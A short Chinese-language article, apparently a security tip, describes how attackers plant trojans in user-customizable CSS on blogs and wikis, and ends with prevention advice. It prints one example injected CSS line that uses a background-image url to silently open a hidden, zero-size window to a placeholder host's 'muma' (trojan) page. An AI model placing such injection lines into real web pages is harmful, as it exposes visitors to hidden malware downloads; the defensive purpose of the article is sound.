CSS可以用來編寫網頁特效，但說到CSS可以掛木馬，你是不是有點不信？隨著web2.0的普及，網頁形式日新月異，許多可以自定義CSS的wiki、網站、社區(qū)、博客日益增多。這也就成了掛馬黑客們的溫床。這些黑客往往借著網民們對大網站的信賴，在自己的博客或其他頁面中植入木馬，欺騙訪問的用戶。一般黑客在CSS中注入木馬的方式很簡單，就是將木馬放到指定的位置，然?后利用body、background-image等方式調用背景圖片，或者在調用的命令中插入T代碼，形成：
background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))
這種中病毒的癥狀一般是不易被發(fā)現(xiàn)的，往往只是表現(xiàn)為打開了一個空白網頁，或者網頁悄悄在后臺運營，干脆讓用戶看不到。所以，為了預防CSS病毒和木馬，大家應該至少做到以下幾條：1、安裝防病毒軟件，在打開來路不明文件時一定要掃描，在軟件有提示時一定慎重選擇操作。    2、不要隨意訪問陌生網頁，盡量屏蔽網頁自動打開的窗口；    3、經常更新系統(tǒng)漏洞文件；    4、過濾比較敏感的CSS內容，如 emiao1:expression(this.src="about:blank"，this.outerHTML="");